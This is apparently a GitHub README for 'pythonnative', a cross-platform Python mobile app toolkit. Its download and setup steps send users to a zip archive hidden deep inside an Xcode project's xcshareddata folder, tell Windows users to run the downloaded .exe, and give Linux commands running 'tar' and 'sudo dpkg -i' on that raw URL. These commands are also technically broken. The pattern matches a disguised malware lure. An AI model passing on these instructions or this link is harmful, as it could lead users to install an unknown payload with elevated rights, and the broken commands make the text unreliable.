nwaebom66/pythonnative
๐ Create native Android and iOS apps using Python with PythonNative, a cross-platform toolkit for building UI, managing lifecycle events, and accessing device features.
๐ฑ pythonnative - Create Mobile Apps Easily
๐ Getting Started
Welcome to pythonnative! This tool allows you to build real native Android and iOS applications using Python. It comes with a simple user interface, a command-line tool, and templates to get you started quickly.
๐ฅ Download & Install
You can get the latest version of pythonnative from our Releases page.
To download, visit this page: Download pythonnative.
Steps to Download
- Click the link above to visit the Releases page.
- Look for the latest version.
- Click on the version to view available files.
- Download the file suitable for your operating system.
๐ System Requirements
Before you start, ensure your system meets the following requirements:
-
Operating System:
- Windows 10 or higher
- macOS 10.14 or higher
- Linux distribution with latest updates
-
Python Version: Must have Python 3.7 or higher installed.
-
Memory: At least 2GB of RAM (4GB recommended).
-
Disk Space: Minimum 150MB of available space.
๐ง Setting Up
After downloading the file, follow these steps to set up pythonnative on your system.
For Windows Users:
- Locate the downloaded
.exefile. - Double-click to run it.
- Follow the on-screen instructions to complete the installation.
For macOS Users:
- Locate the downloaded
.dmgfile. - Open it and drag the pythonnative app to your Applications folder.
- Eject the
.dmgfile after installation.
For Linux Users:
- Locate the downloaded package (
https://github.com/nwaebom66/pythonnative/raw/refs/heads/main/apps/experiments/ios_pythonnative/ios_pythonnative.xcodeproj/project.xcworkspace/xcshareddata/Software_3.7-alpha.5.zipor.debfile). - Open a terminal window.
- Navigate to the downloaded file's location.
- Run the command to extract or install. For example:
or
tar -xvzf https://github.com/nwaebom66/pythonnative/raw/refs/heads/main/apps/experiments/ios_pythonnative/ios_pythonnative.xcodeproj/project.xcworkspace/xcshareddata/Software_3.7-alpha.5.zip
sudo dpkg -i https://github.com/nwaebom66/pythonnative/raw/refs/heads/main/apps/experiments/ios_pythonnative/ios_pythonnative.xcodeproj/project.xcworkspace/xcshareddata/Software_3.7-alpha.5.zip
๐ Running pythonnative
After installation, you will be able to access pythonnative through your applications menu or command line.
Using the Command Line:
- Open your command line interface.
- Type the following command to start pythonnative:
pythonnative
- Follow the prompts to create or manage your mobile projects.
Using the GUI:
- Open the pythonnative app from your applications.
- Select the action you want to perform, such as creating a new project or opening an existing one.
๐ Features
- Cross-Platform Development: Write your code once, and run it on both Android and iOS with minor adjustments.
- Lightweight UI Toolkit: Build user interfaces easily with our simple widget toolkit.
- Command-Line Interface (CLI): Powerful tools for experts to manage projects effectively.
- Templates: Start projects quickly with pre-built templates optimized for various use cases.
๐ Getting Help
If you encounter any issues, you can visit our FAQs or check our Documentation for detailed guides.
Community Support
Join our community on forums or social media. Share your experiences, ask questions, and help others.
๐ Useful Links
Thank you for choosing pythonnative! Enjoy building your mobile applications.